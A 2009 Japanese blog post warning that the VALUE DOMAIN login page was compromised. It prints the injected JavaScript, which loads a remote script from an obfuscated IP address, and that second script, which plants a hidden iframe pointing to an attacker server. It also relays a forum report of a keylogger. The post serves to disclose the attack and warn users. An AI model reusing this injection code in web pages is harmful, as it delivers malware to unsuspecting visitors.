VALUE DOMAINにウイルスコードが仕込まれる!

VALUE DOMAINにウイルスコードが仕込まれる!

ESET NOD32アンチウイルス V3.0



VALUE DOMAINにウイルスコードが仕込まれる!

VALUE DOMAINのHPの一部のページにウイルスが仕込まれてるようです。

ウイルスコードが仕込まれているページは、VALUE DOMAINのログイン画面です。(まだ修正されてないのでリンクは切ってます)
ttps://www.value-domain.com/login.php

上記にアクセスをしたらjavascriptが読み込まれるようです。

PLAIN TEXT
JavaScript:
  1. <SCRIPT LANGUAGE="JAVASCRIPT">
  2. var js = document.createElement("script");
  3. js.src = "http://1856317799:888/s.js";
  4. try {document.getElementsByTagName('head')[0].appendChild(js);}
  5. catch(exp){}
  6. js = null;
  7. </SCRIPT>



s.jsの内容
PLAIN TEXT
JavaScript:
  1. /*dsadasdadasdasdasdas*/
  2. if(document.cookie.indexOf("O=")==-1)
  3. {
  4. var js = document.createElement('iframe');
  5. js.src = "http:\/\/0x6EA52967:888/dir/show.php";
  6. js.width=0;
  7. js.height=0;
  8. try {document.getElementsByTagName('head')[0].appendChild(js);}
  9. catch(exp){}
  10. js = null;
  11.  
  12. var expires=new Date();
  13. expires.setTime(expires.getTime()+24*60*60*1000);
  14. document.cookie="O=Yes;path=/;expires="+expires.toGMTString();
  15. }/*dasdadadsadasdas*/


URLを変換

http:\/\/0x6EA52967:888/dir/show.php

http://110.135.41.103:888/dir/show.php


ある人はこのようにキーロガーが仕込まれていたと報告がありました。

97 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/06(月) 23:07:53 0
>>95に追記

カスペルスキーを実行させながら再実験するとこんな感じになった
そんなスクリーンショット
ttp://www.dotup.org/uploda/www.dotup.org209036.jpg
041.jpg


これは酷い



記事元
VALUE DOMAINってどうよ? part33
http://pc11.2ch.net/test/read.cgi/hosting/1246828727/


私も確認してみたんですが、確かにs.jsのスクリプトがあり読み込んでいましたが、何も起りませんでした。
110.135.41.103のサーバーが落ちてたから無害だったのかも知れません。

VALUE DOMAINは前回もMMOのIDとパスワードが抜かれるスクリプトを一部のHPと、広告サーバーに仕込まれたことがありました。
アクセスする人は要注意。

最近のVALUE DOMAINはますます管理が出来てないです。
新規で借りようと思う人は止めた方が良いです。

2009年07月07日 | カテゴリ: ネットニュース |


関連記事

この記事のURL:

メモにどうぞ
ブックマークに追加する

最新記事

→RSS2.0

前の記事(old)メッセサンオー、エロゲ購入者の個人情報がネット上で流出中!
次の記事(new)子供手当支給開始!なんと1億円以上貰う養子縁組までいることが判明!